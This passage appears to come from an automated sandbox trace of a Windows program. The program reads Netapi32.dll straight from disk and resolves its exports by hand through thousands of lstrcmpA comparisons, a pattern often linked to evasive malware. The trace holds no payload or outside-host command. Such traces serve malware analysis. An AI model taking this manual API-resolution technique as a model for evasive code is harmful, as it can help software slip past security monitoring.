(lpString1="DnsAsyncRegisterHostAddrs", lpString2="AddRefQueryBlobEx") returned 1 [0150.576] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="BreakRecordsIntoBlob") returned 1 [0150.576] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="Coalesce_UpdateNetVersion") returned 1 [0150.576] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="CombineRecordsInBlob") returned 1 [0150.576] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DeRefQueryBlobEx") returned 1 [0150.576] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DelaySortDAServerlist") returned 1 [0150.576] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAcquireContextHandle_A") returned 1 [0150.576] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAcquireContextHandle_W") returned 1 [0150.576] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAllocateRecord") returned 1 [0150.576] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiAlloc") returned 1 [0150.576] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiAllocZero") returned 1 [0150.576] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiFree") returned 1 [0150.576] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiHeapReset") returned 1 [0150.576] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiRealloc") returned 1 [0150.576] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiSetDebugGlobals") returned 1 [0150.576] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAsyncRegisterHostAddrs") returned 0 [0150.576] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0150.576] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0150.576] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="AddRefQueryBlobEx") returned 1 [0150.576] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="BreakRecordsIntoBlob") returned 1 [0150.576] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="Coalesce_UpdateNetVersion") returned 1 [0150.576] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="CombineRecordsInBlob") returned 1 [0150.577] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DeRefQueryBlobEx") returned 1 [0150.577] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DelaySortDAServerlist") returned 1 [0150.577] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAcquireContextHandle_A") returned 1 [0150.577] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAcquireContextHandle_W") returned 1 [0150.577] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAllocateRecord") returned 1 [0150.577] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiAlloc") returned 1 [0150.577] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiAllocZero") returned 1 [0150.577] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiFree") returned 1 [0150.577] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiHeapReset") returned 1 [0150.577] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiRealloc") returned 1 [0150.577] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiSetDebugGlobals") returned 1 [0150.577] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0150.577] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAsyncRegisterInit") returned 0 [0150.577] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0150.577] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0150.577] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="AddRefQueryBlobEx") returned 1 [0150.577] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="BreakRecordsIntoBlob") returned 1 [0150.577] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="Coalesce_UpdateNetVersion") returned 1 [0150.577] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="CombineRecordsInBlob") returned 1 [0150.577] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DeRefQueryBlobEx") returned 1 [0150.577] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DelaySortDAServerlist") returned 1 [0150.577] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAcquireContextHandle_A") returned 1 [0150.577] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAcquireContextHandle_W") returned 1 [0150.577] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAllocateRecord") returned 1 [0150.577] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiAlloc") returned 1 [0150.577] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiAllocZero") returned 1 [0150.577] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiFree") returned 1 [0150.577] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiHeapReset") returned 1 [0150.578] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiRealloc") returned 1 [0150.578] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiSetDebugGlobals") returned 1 [0150.578] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0150.578] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAsyncRegisterInit") returned 1 [0150.578] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAsyncRegisterTerm") returned 0 [0150.578] lstrcmpA (lpString1="DnsCancelQuery", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0150.578] lstrcmpA (lpString1="DnsCancelQuery", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0150.578] lstrcmpA (lpString1="DnsCancelQuery", lpString2="AddRefQueryBlobEx") returned 1 [0150.578] lstrcmpA (lpString1="DnsCancelQuery", lpString2="BreakRecordsIntoBlob") returned 1 [0150.578] lstrcmpA (lpString1="DnsCancelQuery", lpString2="Coalesce_UpdateNetVersion") returned 1 [0150.578] lstrcmpA (lpString1="DnsCancelQuery", lpString2="CombineRecordsInBlob") returned 1 [0150.578] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DeRefQueryBlobEx") returned 1 [0150.578] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DelaySortDAServerlist") returned 1 [0150.578] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAcquireContextHandle_A") returned 1 [0150.578] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAcquireContextHandle_W") returned 1 [0150.578] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAllocateRecord") returned 1 [0150.578] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiAlloc") returned 1 [0150.578] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiAllocZero") returned 1 [0150.578] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiFree") returned 1 [0150.579] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiHeapReset") returned 1 [0150.579] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiRealloc") returned 1 [0150.579] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiSetDebugGlobals") returned 1 [0150.579] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0150.579] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAsyncRegisterInit") returned 1 [0150.579] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAsyncRegisterTerm") returned 1 [0150.579] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsCancelQuery") returned 0 [0150.579] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0150.579] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0150.579] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="AddRefQueryBlobEx") returned 1 [0150.579] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="BreakRecordsIntoBlob") returned 1 [0150.579] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="Coalesce_UpdateNetVersion") returned 1 [0150.579] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="CombineRecordsInBlob") returned 1 [0150.579] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DeRefQueryBlobEx") returned 1 [0150.579] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DelaySortDAServerlist") returned 1 [0150.579] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAcquireContextHandle_A") returned 1 [0150.579] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAcquireContextHandle_W") returned 1 [0150.579] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAllocateRecord") returned 1 [0150.579] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiAlloc") returned 1 [0150.579] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiAllocZero") returned 1 [0150.579] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiFree") returned 1 [0150.579] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiHeapReset") returned 1 [0150.579] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiRealloc") returned 1 [0150.579] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiSetDebugGlobals") returned 1 [0150.580] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0150.592] GetProcessHeap () returned 0x520000 [0150.592] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x3a9d010 | out: hHeap=0x520000) returned 1 [0150.592] GetProcessHeap () returned 0x520000 [0150.592] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x539780 [0150.592] LoadLibraryA (lpLibFileName="Netapi32.dll") returned 0x7ffc5cb30000 [0150.595] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0150.595] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0150.595] GetModuleFileNameA (in: hModule=0x7ffc5cb30000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\Netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")) returned 0x20 [0150.595] CreateFileA (lpFileName="C:\\Windows\\system32\\Netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0150.596] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0150.596] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0150.596] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=80640) returned 1 [0150.596] GetProcessHeap () returned 0x520000 [0150.596] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13b00) returned 0x2d65030 [0150.596] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0150.596] ReadFile (in: hFile=0x17c, lpBuffer=0x2d65030, nNumberOfBytesToRead=0x13b00, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d65030*, lpNumberOfBytesRead=0x14f5a4*=0x13b00, lpOverlapped=0x0) returned 1 [0150.596] CloseHandle (hObject=0x17c) returned 1 [0150.597] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavAddConnection") returned 1 [0150.597] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavDeleteConnection") returned 1 [0150.597] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavFlushFile") returned 1 [0150.597] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavGetExtendedError") returned 1 [0150.597] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavGetHTTPFromUNCPath") returned 1 [0150.597] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavGetUNCFromHTTPPath") returned 1 [0150.597] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesA") returned 1 [0150.597] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesExA") returned 1 [0150.597] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesExW") returned 1 [0150.597] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesW") returned 1 [0150.597] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsDeregisterDnsHostRecordsA") returned 1 [0150.597] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsDeregisterDnsHostRecordsW") returned 1 [0150.597] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsEnumerateDomainTrustsA") returned 1 [0150.597] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsEnumerateDomainTrustsW") returned 1 [0150.597] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcCloseW") returned 1 [0150.597] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameA") returned 1 [0150.597] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameW") returned 1 [0150.597] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameWithAccountA") returned 1 [0150.597] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameWithAccountW") returned 1 [0150.597] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNextA") returned 1 [0150.597] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNextW") returned 1 [0150.597] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcOpenA") returned 1 [0150.597] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcOpenW") returned 1 [0150.598] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcSiteCoverageA") returned 1 [0150.598] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcSiteCoverageW") returned 1 [0150.598] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetForestTrustInformationW") returned 1 [0150.598] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetSiteNameA") returned 1 [0150.598] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetSiteNameW") returned 1 [0150.598] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsMergeForestTrustInformationW") returned 1 [0150.598] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsRoleFreeMemory") returned 1 [0150.598] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsRoleGetPrimaryDomainInformation") returned 1 [0150.598] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsValidateSubnetNameA") returned 1 [0150.598] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsValidateSubnetNameW") returned 1 [0150.598] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserDebugCall") returned 1 [0150.598] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserDebugTrace") returned 1 [0150.598] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserQueryEmulatedDomains") returned 1 [0150.598] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserQueryOtherDomains") returned 1 [0150.598] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserQueryStatistics") returned 1 [0150.598] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserResetNetlogonState") returned 1 [0150.598] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserResetStatistics") returned 1 [0150.598] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserServerEnum") returned 1 [0150.598] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserSetNetlogonState") returned 1 [0150.598] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_DsUpdateReadOnlyServerDnsRecords") returned 1 [0150.598] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetAccountDeltas") returned 1 [0150.598] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetAccountSync") returned 1 [0150.598] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetChainSetClientAttributes") returned 1 [0150.598] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetChainSetClientAttributes2") returned 1 [0150.598] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseDeltas") returned 1 [0150.598] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseRedo") returned 1 [0150.598] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseSync") returned 1 [0150.599] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseSync2") returned 1 [0150.599] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDfsGetVersion") returned 1 [0150.599] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDfsIsThisADomainName") returned 1 [0150.599] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetGetDCList") returned 1 [0150.599] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetGetForestTrustInformation") returned 1 [0150.599] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonControl") returned 1 [0150.599] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonControl2") returned 1 [0150.599] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonGetDomainInfo") returned 1 [0150.599] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogoff") returned 1 [0150.599] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogon") returned 1 [0150.599] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogonEx") returned 1 [0150.599] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogonWithFlags") returned 1 [0150.599] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSendToSam") returned 1 [0150.599] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonUasLogoff") returned 1 [0150.599] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonUasLogon") returned 1 [0150.599] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerAuthenticate") returned 1 [0150.599] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerAuthenticate2") returned 1 [0150.599] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerAuthenticate3") returned 1 [0150.599] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerGetTrustInfo") returned 1 [0150.599] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerPasswordGet") returned 1 [0150.599] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerPasswordSet") returned 1 [0150.600] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerPasswordSet2") returned 1 [0150.600] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerReqChallenge") returned 1 [0150.600] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerSetServiceBits") returned 1 [0150.600] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerSetServiceBitsEx") returned 1 [0150.600] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerTrustPasswordsGet") returned 1 [0150.600] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetlogonComputeClientDigest") returned 1 [0150.600] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetlogonComputeServerDigest") returned 1 [0150.600] lstrcmpA (lpString1="NetAccessAdd", lpString2="NetAccessAdd") returned 0 [0150.600] lstrcmpA (lpString1="NetAccessDel", lpString2="DavAddConnection") returned 1 [0150.600] lstrcmpA (lpString1="NetAccessDel", lpString2="DavDeleteConnection") returned 1 [0150.600] lstrcmpA (lpString1="NetAccessDel", lpString2="DavFlushFile") returned 1 [0150.600] lstrcmpA (lpString1="NetAccessDel", lpString2="DavGetExtendedError") returned 1 [0150.600] lstrcmpA (lpString1="NetAccessDel", lpString2="DavGetHTTPFromUNCPath") returned 1 [0150.600] lstrcmpA (lpString1="NetAccessDel", lpString2="DavGetUNCFromHTTPPath") returned 1 [0150.600] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesA") returned 1 [0150.600] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesExA") returned 1 [0150.600] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesExW") returned 1 [0150.600] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesW") returned 1 [0150.600] lstrcmpA (lpString1="NetAccessDel", lpString2="DsDeregisterDnsHostRecordsA") returned 1 [0150.600] lstrcmpA (lpString1="NetAccessDel", lpString2="DsDeregisterDnsHostRecordsW") returned 1 [0150.600] lstrcmpA (lpString1="NetAccessDel", lpString2="DsEnumerateDomainTrustsA") returned 1 [0150.600] lstrcmpA (lpString1="NetAccessDel", lpString2="DsEnumerateDomainTrustsW") returned 1 [0150.600] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcCloseW") returned 1 [0150.600] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameA") returned 1 [0150.600] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameW") returned 1 [0150.600] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameWithAccountA") returned 1 [0150.600] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameWithAccountW") returned 1 [0150.601] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNextA") returned 1 [0150.601] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNextW") returned 1 [0150.601] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcOpenA") returned 1 [0150.601] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcOpenW") returned 1 [0150.601] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcSiteCoverageA") returned 1 [0150.601] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcSiteCoverageW") returned 1 [0150.601] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetForestTrustInformationW") returned 1 [0150.601] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetSiteNameA") returned 1 [0150.601] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetSiteNameW") returned 1 [0150.601] lstrcmpA (lpString1="NetAccessDel", lpString2="DsMergeForestTrustInformationW") returned 1 [0150.601] lstrcmpA (lpString1="NetAccessDel", lpString2="DsRoleFreeMemory") returned 1 [0150.601] lstrcmpA (lpString1="NetAccessDel", lpString2="DsRoleGetPrimaryDomainInformation") returned 1 [0150.601] lstrcmpA (lpString1="NetAccessDel", lpString2="DsValidateSubnetNameA") returned 1 [0150.815] lstrcmpA (lpString1="NetAccessDel", lpString2="DsValidateSubnetNameW") returned 1 [0150.815] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserDebugCall") returned 1 [0150.815] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserDebugTrace") returned 1 [0150.815] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserQueryEmulatedDomains") returned 1 [0150.815] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserQueryOtherDomains") returned 1 [0150.815] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserQueryStatistics") returned 1 [0150.815] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserResetNetlogonState") returned 1 [0150.815] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserResetStatistics") returned 1 [0150.815] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserServerEnum") returned 1 [0150.815] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserSetNetlogonState") returned 1 [0150.816] lstrcmpA (lpString1="NetAccessDel", lpString2="I_DsUpdateReadOnlyServerDnsRecords") returned 1 [0150.816] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetAccountDeltas") returned 1 [0150.816] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetAccountSync") returned 1 [0150.816] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetChainSetClientAttributes") returned 1 [0150.816] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetChainSetClientAttributes2") returned 1 [0150.816] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseDeltas") returned 1 [0150.816] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseRedo") returned 1 [0150.816] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseSync") returned 1 [0150.816] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseSync2") returned 1 [0150.816] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDfsGetVersion") returned 1 [0150.816] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDfsIsThisADomainName") returned 1 [0150.816] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetGetDCList") returned 1 [0150.816] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetGetForestTrustInformation") returned 1 [0150.816] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonControl") returned 1 [0150.816] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonControl2") returned 1 [0150.816] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonGetDomainInfo") returned 1 [0150.816] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogoff") returned 1 [0150.816] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogon") returned 1 [0150.816] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogonEx") returned 1 [0150.816] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogonWithFlags") returned 1 [0150.816] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSendToSam") returned 1 [0150.816] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonUasLogoff") returned 1 [0150.816] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonUasLogon") returned 1 [0150.817] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerAuthenticate") returned 1 [0150.817] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerAuthenticate2") returned 1 [0150.817] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerAuthenticate3") returned 1 [0150.817] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerGetTrustInfo") returned 1 [0150.817] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerPasswordGet") returned 1 [0150.817] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerPasswordSet") returned 1 [0150.817] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerPasswordSet2") returned 1 [0150.817] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerReqChallenge") returned 1 [0150.817] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerSetServiceBits") returned 1 [0150.817] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerSetServiceBitsEx") returned 1 [0150.817] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerTrustPasswordsGet") returned 1 [0150.817] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetlogonComputeClientDigest") returned 1 [0150.817] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetlogonComputeServerDigest") returned 1 [0150.817] lstrcmpA (lpString1="NetAccessDel", lpString2="NetAccessAdd") returned 1 [0150.817] lstrcmpA (lpString1="NetAccessDel", lpString2="NetAccessDel") returned 0 [0150.817] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavAddConnection") returned 1 [0150.817] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavDeleteConnection") returned 1 [0150.817] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavFlushFile") returned 1 [0150.817] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavGetExtendedError") returned 1 [0150.817] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavGetHTTPFromUNCPath") returned 1 [0150.817] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavGetUNCFromHTTPPath") returned 1 [0150.817] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesA") returned 1 [0150.817] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesExA") returned 1 [0150.817] lstrcmpA (lpString1="NetAccessEnum", 